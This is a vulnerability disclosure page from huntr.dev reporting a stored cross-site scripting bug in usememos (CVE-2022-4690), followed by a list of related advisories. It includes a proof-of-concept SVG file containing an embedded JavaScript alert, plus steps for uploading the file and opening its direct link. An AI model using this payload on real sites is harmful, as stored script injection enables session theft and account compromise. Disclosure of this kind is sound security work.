Lucene search
Mike9937E1BE91D-3B13-4300-8AF2-9BD9665EC335HistoryDec 20, 2022 - 8:15 a.m.
Stored XSS via SVG File
2022-12-2008:15:50
mike993
www.huntr.dev
20
stored xss
svg file
usememos
crafted file
direct link
0.001 Low
EPSS
Percentile
20.3%
Description
usememos has a feature to upload file and display it. By uploading a crafted SVG files, the users can perform Stored XSS attack with the image direct link.
Copy the following code and save as filename.svg.
Proof of Concept (filename.svg)
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
- Login as user
- create a new post and upload the svg file
- save the post
- take the direct link of the image and open it in a new tab
- see XSS (example link: https://<yoursite>/o/r/8/filename.svg).
if you need more specific information, feel free to contact me.
Related
osv
osv
usememos/memos vulnerable to stored cross-site scripting (XSS)
2022-12-23 12:30:25
CVE-2022-4690
2022-12-23 12:15:12
cve
cve
CVE-2022-4690
2022-12-23 12:15:12
veracode
veracode
Cross-site Scripting (XSS)
2022-12-27 04:00:26
nvd
nvd
CVE-2022-4690
2022-12-23 12:15:12
cvelist
cvelist
CVE-2022-4690 Cross-site Scripting (XSS) - Stored in usememos/memos
2022-12-23 00:00:00
prion
prion
Cross site scripting
2022-12-23 12:15:00
github
github
usememos/memos vulnerable to stored cross-site scripting (XSS)
2022-12-23 12:30:25